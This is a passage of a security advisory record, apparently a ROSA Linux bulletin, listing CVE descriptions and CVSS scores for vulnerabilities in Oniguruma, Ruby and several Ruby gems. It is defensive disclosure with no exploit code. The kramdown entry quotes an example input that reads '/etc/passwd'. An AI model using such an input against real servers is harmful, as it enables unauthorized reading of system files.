CVE-2017-9226\nCVE-Crit: CRITICAL\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in Oniguruma-mod in Ruby before 2.4.1.1 and mbstring in PHP before 7.1.5. Writing or reading outside the heap occurs in next_state_val () during regular expression compilation. Octal numbers greater than 0xff are incorrectly handled in fetch_token () and fetch_token_in_cc (). An incorrectly generated regular expression containing an octal number of the form '{ 700' will result in an invalid code point value greater than 0xff in next_state_val (), which will cause memory corruption when writing beyond the valid limits. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2017-9227\nCVE-Crit: CRITICAL\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in Oniguruma-mod in Ruby before 2.4.1 and mbstring in PHP before 7.1.5. Off-stack reads occur in mbc_enc_len () during regular expression lookup. Invalid reg-&gt; dmin processing in forward_search_range () may result in invalid pointer dereferencing, since the out-of-bounds output is read from the stack buffer. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2017-9228\nCVE-Crit: CRITICAL\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in Oniguruma-mod in Ruby before 2.4.1.1 and mbstring in PHP before 7.1.5. An off-heap write occurs in bitset_set_range () during compilation of a regular expression due to an uninitialized variable from an invalid state transition. An invalid state transition in parse_char_class () can create an execution path that leaves a critical local variable uninitialized until it is used as an index, resulting in memory corruption of writing outside the allowed limits. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2017-9229\nCVE-Crit: HIGH\nCVE-DESC: The issue was found in Oniguruma 6.2.0, which was used in Oniguruma-mod in Ruby before 2.4.1.1 and mbstring in PHP before 7.1.5. SIGSEGV occurs in left_adjust_char_head () during regular expression compilation. Invalid reg-&gt; dmax processing in forward_search_range () can result in invalid pointer dereferencing, usually as an immediate denial-of-service condition. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2018-16468\nCVE-Crit: MEDIUM\nCVE-DESC: In the Loofah gem for Ruby, up to v2.2.2, raw JavaScript code may appear in the cleaned output when republishing a created SVG element. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2018-3740\nCVE-Crit: HIGH\nCVE-DESC: A specially crafted HTML snippet can cause the Sanitize gem for Ruby to allow non-whitelisted attributes in a whitelisted HTML element. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2018-3777\nCVE-Crit: CRITICAL\nCVE-DESC: Insufficient URI encoding in restforce before version 3.0.0 allows an attacker to inject arbitrary parameters into Salesforce API requests. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2018-8048\nCVE-Crit: MEDIUM\nCVE-DESC: In the Loofah gem prior to version 2.2.0 for Ruby, HTML attributes that are not whitelisted can appear in cleaned output by republishing the created HTML snippet. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2019-12732\nCVE-Crit: MEDIUM\nCVE-DESC: Chartkick gem up to version 3.1.0 for Ruby supports XSS. \nCVE-STATUS: Default\nCVE-REV: default\n \n \nCVE-ID: CVE-2019-17383\nCVE-Crit: CRITICAL\nCVE-DESC: netaddr gem before 2.0.4 for Ruby has incorrectly configured file permissions, so installing the gem may result in 0777 permissions on the target file system. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2019-16254\nCVE-Crit: MEDIUM\nCVE-DESC: Ruby up to versions 2.4.7, 2.5.x to 2.5.6, and 2.6.x to 2.6.4 allows HTTP response splitting. If a program using WEBrick inserts untrusted input into the response header, an attacker could use it to insert a newline character to split the header and inject malicious content to trick clients. NOTE: this issue exists due to an incomplete fix for CVE-2017-17742 that addressed the CRLF vector but did not address the isolated CR or isolated LF. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2019-15587\nCVE-Crit: MEDIUM\nCVE-DESC: In the Loofah gem for Ruby before v2.3.0, raw JavaScript may appear in the cleaned output when republishing a created SVG element. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2019-3881\nCVE-Crit: HIGH\nCVE-DESC: Bundler before 2.1.0 uses a predictable path in / tmp /, created with unprotected permissions, as the storage location for gems if locations in the user's home directory are unavailable. If Bundler is used in a scenario where the user does not have a writable home directory, an attacker could place malicious code in that directory that is later downloaded and executed. \nCVE-STATUS: Default\nCVE-REV: Default\n \n \nCVE-ID: CVE-2020-15237\nCVE-Crit: MEDIUM\nCVE-DESC: In Shrine before version 3.3.0, when using the `Derivation_endpoint` plug-in, an attacker could use a timing attack to guess the signature of a derived URL. The problem was fixed by comparing the sent and computed signature over a constant time using `Rack :: Utils.secure_compare`. Users using the `Derivation_endpoint` plugin are strongly recommended to upgrade to Shrine 3.3.0 or higher. A possible workaround is listed in the linked recommendations. \nCVE-STATUS: default\nCVE-REV: default\n \n \nCVE-ID: CVE-2020-14001\nCVE-Crit: CRITICAL\nCVE-DESC: The kramdown gem prior to 2.3.0 for Ruby by default handles the template parameter within Kramdown documents, allowing unintended read access (e.g., template = \"/ etc / passwd\") or unintended execution of Ruby embedded code (e.g., a string that starts with template = \"string: //\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T18:06:34", "type": "rosalinux", "title": "Advisory ROSA-SA-2021-1966", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6684", "CVE-2013-1812", "CVE-2013-6459", "CVE-2015-2963", "CVE-2015-4410", "CVE-2015-4411", "CVE-2015-9096", "CVE-2015-9097", "CVE-2016-6582", "CVE-2017-1002201", "CVE-2017-17742", "CVE-2017-9224", "CVE-2017-9225", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-16468", "CVE-2018-3740", "CVE-2018-3777", "CVE-2018-8048", "CVE-2019-12732", "CVE-2019-15587", "CVE-2019-16254", "CVE-2019-17383", "CVE-2019-3881", "CVE-2020-14001", "CVE-2020-15169", "CVE-2020-15237", "CVE-2020-16253", "CVE-2020-16254", "CVE-2020-25613", "CVE-2020-25739", "CVE-2020-26298", "CVE-2020-36190", "CVE-2020-5216", "CVE-2020-5217", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-7670", "CVE-2021-21289", "CVE-2021-28834", "CVE-2021-28965", "CVE-2021-29509"], "modified": "2021-07-02T18:06:34", "id": "ROSA-SA-2021-1966", "href": "https://abf.rosalinux.ru/advisories/ROSA-SA-2021-1966", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}